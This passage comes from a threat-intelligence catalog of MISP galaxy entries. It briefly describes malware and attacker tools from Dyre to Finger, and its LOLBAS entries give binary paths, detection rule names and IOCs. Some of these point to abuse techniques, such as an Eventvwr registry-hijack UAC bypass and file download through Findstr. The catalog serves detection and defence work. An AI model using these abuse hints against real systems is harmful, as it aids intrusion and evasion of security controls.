| platforms | ['Windows'] |
| software_attack_id | S5220 |
| source | Tidal Cyber |
| tags | ['6d065f28-e32d-4e87-b315-c43ebc45532a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Dyre
Dyre is a banking Trojan that has been used for financial gain. [Symantec Dyre June 2015][Malwarebytes Dyreza November 2015]
Internal MISP references
UUID 38e012f7-fb3a-4250-a129-92da3a488724 which can be used as unique global reference for Dyre in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0024 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Earthworm
Earthworm is an open-source tool. According to its project website, Earthworm is a "simple network tunnel with SOCKS v5 server and port transfer".[Elastic Docs Potential Protocol Tunneling via EarthWorm] According to joint Cybersecurity Advisory AA23-144a (May 2023), Volt Typhoon actors have used Earthworm in their attacks.[U.S. CISA Volt Typhoon May 24 2023]
Internal MISP references
UUID ee14e483-b5ef-4931-9c2a-72046b6555cc which can be used as unique global reference for Earthworm in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5013 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Ebury
Ebury is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).[ESET Ebury Feb 2014][BleepingComputer Ebury March 2017][ESET Ebury Oct 2017]
Internal MISP references
UUID 2375465a-e6a9-40ab-b631-a5b04cf5c689 which can be used as unique global reference for Ebury in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0377 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
ECCENTRICBANDWAGON
ECCENTRICBANDWAGON is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.[CISA EB Aug 2020]
Internal MISP references
UUID 70f703b3-0e24-4ffe-9772-f0e386ec607f which can be used as unique global reference for ECCENTRICBANDWAGON in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0593 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Ecipekac
Ecipekac is a multi-layer loader that has been used by menuPass since at least 2019 including use as a loader for P8RAT, SodaMaster, and FYAnti.[Securelist APT10 March 2021]
Internal MISP references
UUID 6508d3dc-eb22-468c-9122-dcf541caa69c which can be used as unique global reference for Ecipekac in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0624 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Egregor
Egregor is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between Egregor and Sekhmet ransomware, as well as Maze ransomware.[NHS Digital Egregor Nov 2020][Cyble Egregor Oct 2020][Security Boulevard Egregor Oct 2020]
Internal MISP references
UUID 0e36b62f-a6e2-4406-b3d9-e05204e14a66 which can be used as unique global reference for Egregor in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0554 |
| source | MITRE |
| tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad', '0ed7d10c-c65b-4174-9edb-446bf301d250', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
EKANS
EKANS is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. EKANS has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in MegaCortex.[Dragos EKANS][Palo Alto Unit 42 EKANS]
Internal MISP references
UUID cd7821cb-32f3-4d81-a5d1-0cdee94a15c4 which can be used as unique global reference for EKANS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0605 |
| source | MITRE |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Elise
Elise is a custom backdoor Trojan that appears to be used exclusively by Lotus Blossom. It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. [Lotus Blossom Jun 2015][Accenture Dragonfish Jan 2018]
Internal MISP references
UUID fd5efee9-8710-4536-861f-c88d882f4d24 which can be used as unique global reference for Elise in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0081 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
ELMER
ELMER is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by APT16. [FireEye EPS Awakens Part 2]
Internal MISP references
UUID 6a3ca97e-6dd6-44e5-a5f0-7225099ab474 which can be used as unique global reference for ELMER in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0064 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Emissary
Emissary is a Trojan that has been used by Lotus Blossom. It shares code with Elise, with both Trojans being part of a malware group referred to as LStudio. [Lotus Blossom Dec 2015]
Internal MISP references
UUID fd95d38d-83f9-4b31-8292-ba2b04275b36 which can be used as unique global reference for Emissary in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0082 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Emotet
Emotet is a modular malware variant which is primarily used as a downloader for other malware variants such as TrickBot and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. [Trend Micro Banking Malware Jan 2019]
Internal MISP references
UUID c987d255-a351-4736-913f-91e2f28d0654 which can be used as unique global reference for Emotet in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0367 |
| source | MITRE |
| tags | ['71dfe8d1-666f-4e71-8761-d2876078fb3e', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Empire
Empire is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[NCSC Joint Report Public Tools][Github PowerShell Empire][GitHub ATTACK Empire]
Internal MISP references
UUID fea655ac-558f-4dd0-867f-9a5553626207 which can be used as unique global reference for Empire in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0363 |
| source | MITRE |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '4f05a12d-f497-4081-acb9-9a257ab87886', '15787198-6c8b-4f79-bf50-258d55072fee', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
EnvyScout
EnvyScout is a dropper that has been used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021]
Internal MISP references
UUID 8da6fbf0-a18d-49a0-9235-101300d49d5e which can be used as unique global reference for EnvyScout in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0634 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Epic
Epic is a backdoor that has been used by Turla. [Kaspersky Turla]
Internal MISP references
UUID a7e71387-b276-413c-a0de-4cf07e39b158 which can be used as unique global reference for Epic in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0091 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
esentutl
esentutl is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.[Microsoft Esentutl]
Internal MISP references
UUID a7589733-6b04-4215-a4e7-4b62cd4610fa which can be used as unique global reference for esentutl in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0404 |
| source | MITRE |
| tags | ['ee88899a-2bf0-4b96-bf69-5b686fa463c3', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Eventvwr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Displays Windows Event Logs in a GUI window.
Author: Jacob Gajek
Paths: * C:\Windows\System32\eventvwr.exe * C:\Windows\SysWOW64\eventvwr.exe
Resources: * https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ * https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 * https://twitter.com/orange_8361/status/1518970259868626944
Detection: * Sigma: proc_creation_win_uac_bypass_eventvwr.yml * Sigma: registry_set_uac_bypass_eventvwr.yml * Sigma: file_event_win_uac_bypass_eventvwr.yml * Elastic: privilege_escalation_uac_bypass_event_viewer.toml * Splunk: eventvwr_uac_bypass.yml * IOC: eventvwr.exe launching child process other than mmc.exe * IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command[Eventvwr.exe - LOLBAS Project]
Internal MISP references
UUID 4c371bd9-c97c-42ab-b913-1e19cd409382 which can be used as unique global reference for Eventvwr in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5105 |
| source | Tidal Cyber |
| tags | ['59d03fb8-0620-468a-951c-069473cb86bc', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
EvilBunny
EvilBunny is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.[Cyphort EvilBunny Dec 2014]
Internal MISP references
UUID 300e8176-e7ee-44ef-8d10-dff96502f6c6 which can be used as unique global reference for EvilBunny in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0396 |
| source | MITRE |
| type | ['malware'] |
EvilGinx
EvilGinx is an open-source software project. According to its GitHub repository, EvilGinx is a "Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication".[GitHub evilginx2]
Internal MISP references
UUID 4892c22d-6fd4-4876-8e8a-af968cf61ecc which can be used as unique global reference for EvilGinx in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5078 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
EvilGrab
EvilGrab is a malware family with common reconnaissance capabilities. It has been deployed by menuPass via malicious Microsoft Office documents as part of spearphishing campaigns. [PWC Cloud Hopper Technical Annex April 2017]
Internal MISP references
UUID e862419c-d6b6-4433-a02a-c1cc98ea6f9e which can be used as unique global reference for EvilGrab in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0152 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
EVILNUM
EVILNUM is fully capable backdoor that was first identified in 2018. EVILNUM is used by the APT group Evilnum which has the same name.[ESET EvilNum July 2020][Prevailion EvilNum May 2020]
Internal MISP references
UUID e0eaae6d-5137-4053-bf37-ff90bf5767a9 which can be used as unique global reference for EVILNUM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0568 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Exaramel for Linux
Exaramel for Linux is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under Exaramel for Windows.[ESET TeleBots Oct 2018]
Internal MISP references
UUID c773f709-b5fe-4514-9d88-24ceb0dd8063 which can be used as unique global reference for Exaramel for Linux in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0401 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Exaramel for Windows
Exaramel for Windows is a backdoor used for targeting Windows systems. The Linux version is tracked separately under Exaramel for Linux.[ESET TeleBots Oct 2018]
Internal MISP references
UUID 21569dfb-c9f1-468e-903e-348f19dbae1f which can be used as unique global reference for Exaramel for Windows in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0343 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Excel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office binary
Author: Reegun J (OCBC Bank)
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe * C:\Program Files\Microsoft Office\Office16\Excel.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe * C:\Program Files\Microsoft Office\Office15\Excel.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe * C:\Program Files\Microsoft Office\Office14\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe * C:\Program Files\Microsoft Office\Office12\Excel.exe * C:\Program Files\Microsoft Office\Office12\Excel.exe
Resources: * https://twitter.com/reegun21/status/1150032506504151040 * https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Detection: * Sigma: proc_creation_win_lolbin_office.yml * IOC: Suspicious Office application Internet/network traffic[Excel.exe - LOLBAS Project]
Internal MISP references
UUID 46efd94e-afd2-4536-8525-0619fc56966f which can be used as unique global reference for Excel in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5221 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ExMatter
ExMatter is a custom data exfiltration tool. It was first observed in November 2021 during intrusions involving BlackMatter ransomware, and more recently has been used during BlackCat ransomware attacks. In August 2022, researchers observed a “heavily updated” version of ExMatter, which featured expanded protocols for exfiltrating data, a data corruption capability, enhanced defense evasion abilities, and a narrower range of targeted file types.[Symantec Noberus September 22 2022]
Internal MISP references
UUID 068b26ae-39b5-4b4e-8faa-eb304a17687d which can be used as unique global reference for ExMatter in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5054 |
| source | Tidal Cyber |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Expand
Expand is a Windows utility used to expand one or more compressed CAB files.[Microsoft Expand Utility] It has been used by BBSRAT to decompress a CAB file into executable content.[Palo Alto Networks BBSRAT]
Internal MISP references
UUID 5d7a39e3-c667-45b3-987e-3b0ca49cff61 which can be used as unique global reference for Expand in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0361 |
| source | MITRE |
| tags | ['182dd4be-bbda-404f-aad1-156a22bbe7a4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Explorer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary used for managing files and system components within Windows
Author: Jai Minton
Paths: * C:\Windows\explorer.exe * C:\Windows\SysWOW64\explorer.exe
Resources: * https://twitter.com/CyberRaiju/status/1273597319322058752?s=20 * https://twitter.com/bohops/status/1276356245541335048 * https://twitter.com/bohops/status/986984122563391488
Detection: * Sigma: proc_creation_win_explorer_break_process_tree.yml * Sigma: proc_creation_win_explorer_lolbin_execution.yml * Elastic: initial_access_via_explorer_suspicious_child_parent_args.toml * IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious.[Explorer.exe - LOLBAS Project]
Internal MISP references
UUID b792d713-fbb4-46e6-94ae-8b9a1f4e794d which can be used as unique global reference for Explorer in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5106 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Explosive
Explosive is a custom-made remote access tool used by the group Volatile Cedar. It was first identified in the wild in 2015.[CheckPoint Volatile Cedar March 2015][ClearSky Lebanese Cedar Jan 2021]
Internal MISP references
UUID 572eec55-2855-49ac-a82e-2c21e9aca27e which can be used as unique global reference for Explosive in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0569 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Extexport
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Load a DLL located in the c:\test folder with a specific name.
Author: Oddvar Moe
Paths: * C:\Program Files\Internet Explorer\Extexport.exe * C:\Program Files (x86)\Internet Explorer\Extexport.exe
Resources: * http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
Detection: * Sigma: proc_creation_win_lolbin_extexport.yml * IOC: Extexport.exe loads dll and is execute from other folder the original path[Extexport.exe - LOLBAS Project]
Internal MISP references
UUID 2e6f1aed-a983-44fb-aed1-b4a3d9cb9488 which can be used as unique global reference for Extexport in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5107 |
| source | Tidal Cyber |
| tags | ['5b81675a-742a-4ffd-b410-44ce3f1b0831', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ExtPassword
ExtPassword is a tool used to recover passwords from Windows systems.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 363c38fc-8676-4a63-b3f4-f0237565a951 which can be used as unique global reference for ExtPassword in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5030 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Extrac32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Extract to ADS, copy or overwrite a file with Extrac32.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\extrac32.exe * C:\Windows\SysWOW64\extrac32.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * https://twitter.com/egre55/status/985994639202283520
Detection: * Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml * Sigma: proc_creation_win_lolbin_extrac32.yml * Sigma: proc_creation_win_lolbin_extrac32_ads.yml[Extrac32.exe - LOLBAS Project]
Internal MISP references
UUID 53dc0180-0309-4489-af75-9c76b2887359 which can be used as unique global reference for Extrac32 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5108 |
| source | Tidal Cyber |
| tags | ['92092803-19a9-4288-b7fb-08e92e8ea693', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
FakeM
FakeM is a shellcode-based Windows backdoor that has been used by Scarlet Mimic. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 8c64a330-1457-4c32-ab2f-12b6eb37d607 which can be used as unique global reference for FakeM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0076 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
FALLCHILL
FALLCHILL is a RAT that has been used by Lazarus Group since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other Lazarus Group malware or delivered when a victim unknowingly visits a compromised website. [US-CERT FALLCHILL Nov 2017]
Internal MISP references
UUID ea47f1fd-0171-4254-8c92-92b7a5eec5e1 which can be used as unique global reference for FALLCHILL in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0181 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
FatDuke
FatDuke is a backdoor used by APT29 since at least 2016.[ESET Dukes October 2019]
Internal MISP references
UUID 997ff740-1b00-40b6-887a-ef4101e93295 which can be used as unique global reference for FatDuke in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0512 |
| source | MITRE |
| tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Felismus
Felismus is a modular backdoor that has been used by Sowbug. [Symantec Sowbug Nov 2017] [Forcepoint Felismus Mar 2017]
Internal MISP references
UUID c66ed8ab-4692-4948-820e-5ce87cc78db5 which can be used as unique global reference for Felismus in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0171 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
FELIXROOT
FELIXROOT is a backdoor that has been used to target Ukrainian victims. [FireEye FELIXROOT July 2018]
Internal MISP references
UUID 4b1a07cd-4c1f-4d93-a454-07fd59b3039a which can be used as unique global reference for FELIXROOT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0267 |
| source | MITRE |
| type | ['malware'] |
Ferocious
Ferocious is a first stage implant composed of VBS and PowerShell scripts that has been used by WIRTE since at least 2021.[Kaspersky WIRTE November 2021]
Internal MISP references
UUID 3e54ba7a-fd4c-477f-9c2d-34b4f69fc091 which can be used as unique global reference for Ferocious in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0679 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Fgdump
Fgdump is a Windows password hash dumper. [Mandiant APT1]
Internal MISP references
UUID 1bbf04bb-d869-48c5-a538-70a25503de1d which can be used as unique global reference for Fgdump in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0120 |
| source | MITRE |
| type | ['tool'] |
FileZilla
FileZilla is a tool used to perform cross-platform File Transfer Protocol (FTP) to a site, server, or host.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID f2a6f899-15a8-4d77-bebd-14bc03958764 which can be used as unique global reference for FileZilla in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5031 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Final1stspy
Final1stspy is a dropper family that has been used to deliver DOGCALL.[Unit 42 Nokki Oct 2018]
Internal MISP references
UUID eb4dc358-e353-47fc-8207-b7cb10d580f7 which can be used as unique global reference for Final1stspy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0355 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Findstr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Write to ADS, discover, or download files with Findstr.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\findstr.exe * C:\Windows\SysWOW64\findstr.exe
Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_lolbin_findstr.yml[Findstr.exe - LOLBAS Project]
Internal MISP references
UUID a62634f8-8f42-4874-9669-bea2e053dfea which can be used as unique global reference for Findstr in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5109 |
| source | Tidal Cyber |
| tags | ['6ca537bb-94b6-4b12-8978-6250baa6a5cb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
FinFisher
FinFisher is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including Wingbird. [FinFisher Citation] [Microsoft SIR Vol 21] [FireEye FinSpy Sept 2017] [Securelist BlackOasis Oct 2017] [Microsoft FinFisher March 2018]
Internal MISP references
UUID 41f54ce1-842c-428a-977f-518a5b63b4d7 which can be used as unique global reference for FinFisher in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Android', 'Windows'] |
| software_attack_id | S0182 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Finger
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
